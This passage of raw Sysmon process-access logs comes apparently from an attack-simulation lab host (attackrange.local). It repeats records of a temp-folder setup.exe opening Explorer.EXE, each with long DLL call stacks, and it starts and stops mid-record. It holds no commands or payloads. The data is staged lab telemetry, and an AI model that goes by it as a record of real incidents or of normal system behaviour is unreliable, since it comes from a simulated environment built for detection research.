e.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 